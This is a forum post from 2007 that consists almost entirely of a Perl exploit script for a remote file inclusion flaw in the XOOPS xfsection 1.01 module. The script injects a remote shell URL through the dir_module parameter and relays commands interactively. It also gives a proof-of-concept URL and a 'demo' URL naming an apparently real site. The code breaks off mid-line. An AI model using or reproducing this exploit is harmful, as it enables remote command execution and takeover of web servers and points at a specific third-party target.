fl0 fl0w Posted July 1, 2007 Report Posted July 1, 2007 #!/usr/bin/perl sub header(){ print q { ========================================================================= XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit Exploit Coded by fl0 fl0w flo_flow_supremacy[at]yahoo[dot]com PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell? Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL? ========================================================================= } } sub routine() { header(); print q { ====================================================================================================== USAGE: perl exploit.pl <http://site.com/modules/xfsection/modify.php?dir_module=shell?&cmdvar=command> EXAMPLE: perl [localhost\][path] exploit.pl http://site.com/====================================================================================================== }; exit(); } use LWP::UserAgent; $site=@ARGV[0]; $shells=@ARGV[1]; $shellcmd=@ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shells) { routine() }header(); while() { print"[shell] \$"; while(<STDIN>){ $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/modules/xfsection/modify.php?dir_module='.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n"; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[\n]/[ Quote
